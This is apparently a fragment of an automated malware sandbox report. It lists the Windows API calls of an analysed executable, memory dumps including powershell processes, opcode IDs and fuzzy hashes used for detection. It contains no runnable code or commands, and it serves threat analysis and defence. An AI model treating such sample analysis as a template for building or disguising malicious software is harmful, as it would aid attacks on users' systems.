                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                                • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                                • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                  • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                  • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                  • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                  • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                                • String ID:
                                                                • API String ID: 2538916108-0
                                                                • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                                • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                                • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                                • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                                • DeleteObject.GDI32(00000000), ref: 00406878
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                • String ID:
                                                                • API String ID: 1900162674-0
                                                                • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                                                • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                                                APIs
                                                                • memset.MSVCRT ref: 0040749F
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                                                • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                                                • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                                  • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                  • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                • String ID:
                                                                • API String ID: 1557639607-0
                                                                • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                                                • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                                                APIs
                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                                  • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                  • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                • String ID:
                                                                • API String ID: 612612615-0
                                                                • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                                                • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                                                APIs
                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                                                • SetWindowTextW.USER32(?,?), ref: 00403B12
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@TextWindow$Length
                                                                • String ID:
                                                                • API String ID: 2308334395-0
                                                                • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                                                • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                                                APIs
                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                                                • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                                                • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: CreateFontIndirectItemMessageObjectSend
                                                                • String ID:
                                                                • API String ID: 2001801573-0
                                                                • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                                                • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                                                APIs
                                                                • GetParent.USER32(?), ref: 00401BA8
                                                                • GetWindowRect.USER32(?,?), ref: 00401BC1
                                                                • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                                                • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ClientScreen$ParentRectWindow
                                                                • String ID:
                                                                • API String ID: 2099118873-0
                                                                • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                                • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: _wtol
                                                                • String ID: GUIFlags$[G@
                                                                • API String ID: 2131799477-2126219683
                                                                • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                                • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                                APIs
                                                                • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: EnvironmentVariable
                                                                • String ID: ?O@
                                                                • API String ID: 1431749950-3511380453
                                                                • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                                • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.201200476762.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_5200000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c7f7dc2b1bb4d77747caa98da154c615b7eaf949a4815b5d918853be6190e838
                                                                • Instruction ID: f90dce0c635ceebaf6744111f71dbe5167de3821c10de2240a0914a50b3e2ae6
                                                                • Opcode Fuzzy Hash: c7f7dc2b1bb4d77747caa98da154c615b7eaf949a4815b5d918853be6190e838
                                                                • Instruction Fuzzy Hash: ED917074A00605DFCB15CF58C498ABAFBB5FF88310B25816AD816AB3A5C735EC51CBA4
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.201200476762.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_5200000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8cba27dee64e25422460249fd35fb70eee73069a12b0502544c35f42d9130ae4
                                                                • Instruction ID: f259c12fba4f19d9f9af79c2ef3e85351a886a9d213b496df89fc004f3e32f7d
                                                                • Opcode Fuzzy Hash: 8cba27dee64e25422460249fd35fb70eee73069a12b0502544c35f42d9130ae4
                                                                • Instruction Fuzzy Hash: AA414C74A11205DFCB05CF58C098EBAFBB5FF48310B15816AD81A9B3A5C732EC91CBA4
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.201199699441.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_34fd000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 186170732a32720fe5b3f94bab656619c6e00ff0758011a123c45cb1411ce0bd
                                                                • Instruction ID: 56e5f9f36064e67a5e1e81cd6609b1d8531045c5afc79987246afedd3848013a
                                                                • Opcode Fuzzy Hash: 186170732a32720fe5b3f94bab656619c6e00ff0758011a123c45cb1411ce0bd
                                                                • Instruction Fuzzy Hash: B101407240D3C05FD7128B258894B52BFB8DF43224F1D80DBD9948F297C2695848CB72
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.201199699441.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_34fd000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 03b6c1f604ab611e99bcd95b2f2c2a0efd1c58fde1a0fb07e2939128f726b8e3
                                                                • Instruction ID: a7bdf496933fdedc278927a8d8a3c0035a412ae90bad44c01b848bb7a4edd3fc
                                                                • Opcode Fuzzy Hash: 03b6c1f604ab611e99bcd95b2f2c2a0efd1c58fde1a0fb07e2939128f726b8e3
                                                                • Instruction Fuzzy Hash: C701A7319043409FE7209A15CCC4767FF9CDF42268F1C856BEE551F286D2799845CABA
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201215383650.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7160000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5db009213ded7a2cf9bf57f482b60f860ecc4de4f917a47e8e69e637d7edfab9
                                                                • Instruction ID: 5c2d439fc86cabd5f3b22484884fc50cc1e84dbbea5dde29b1a67d6d6d03d297
                                                                • Opcode Fuzzy Hash: 5db009213ded7a2cf9bf57f482b60f860ecc4de4f917a47e8e69e637d7edfab9
                                                                • Instruction Fuzzy Hash: A6128A75B0030AAFEB168B6884157BB7BB6AFC1250F14C47AD905DB2D1EB31C861D792
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201200559092.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_d20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f9f55d00319c8f6f7719add5350d19bd056594ff3d26527a3eb37b0ca373cfc5
                                                                • Instruction ID: b1958dcbe1173eae6dd4596f6577e09ff220a8efa9ebcfe94a1ebf9de6e2d3e6
                                                                • Opcode Fuzzy Hash: f9f55d00319c8f6f7719add5350d19bd056594ff3d26527a3eb37b0ca373cfc5
                                                                • Instruction Fuzzy Hash: AD91AD70A002199FCB15CF58C494ABEFBF1FF98314B2485A9E815AB7A5C735EC51CBA0
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201215383650.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7160000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5fe913a880cf856a9f99a410a11581ca783b45c9b4f5545ebf86708e37a8e5bf
                                                                • Instruction ID: 7b320dcb49a4192591fc24207b17390ec1b9b777dda1ab49ad96e1b37cd24875
                                                                • Opcode Fuzzy Hash: 5fe913a880cf856a9f99a410a11581ca783b45c9b4f5545ebf86708e37a8e5bf
                                                                • Instruction Fuzzy Hash: 684139B1B0120AEFDB15CB588455A7A7BABAF80784F188069DD04DB291E731CC54EB92
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201200559092.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_d20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c38798ce5a0f8323668aa7983d90ce3126a604ae74c4ccd38cc45b4bc80a0766
                                                                • Instruction ID: 52a74dc0f7b56ee6b4075e5125e0ad9e3d40ab1df5f86e9f2ea365713a07db9b
                                                                • Opcode Fuzzy Hash: c38798ce5a0f8323668aa7983d90ce3126a604ae74c4ccd38cc45b4bc80a0766
                                                                • Instruction Fuzzy Hash: 89414874A002199FCB15CF48D598ABEF7B1FF58314B1582A9E815AB364C732FC61CBA4
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201200559092.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_d20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 73dc54b07ebe35d9c340c50ced18149775e25f55a7e777a57b28a24324b7f3ca
                                                                • Instruction ID: 8db69fb15681c79ea53ed88cfff0e819af757a95c442e5592a18095960e67c02
                                                                • Opcode Fuzzy Hash: 73dc54b07ebe35d9c340c50ced18149775e25f55a7e777a57b28a24324b7f3ca
                                                                • Instruction Fuzzy Hash: 25318474A093958FCB12CF68D8949AABFB1EF4631071940EED485DF393C628ED05CB62
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201200559092.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_d20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aa321d0be353a16b18532a7a7cf2fd403c9e4d3db087223b4d7cf78105789965
                                                                • Instruction ID: dd30b8709bf53f960f4df1e57887d33402e2540e305caf9b7fbb77dbe0224820
                                                                • Opcode Fuzzy Hash: aa321d0be353a16b18532a7a7cf2fd403c9e4d3db087223b4d7cf78105789965
                                                                • Instruction Fuzzy Hash: CE215174A042199FCB04DF98D480AAEFBF4FF89310B15809AE419EB352C735ED41DBA1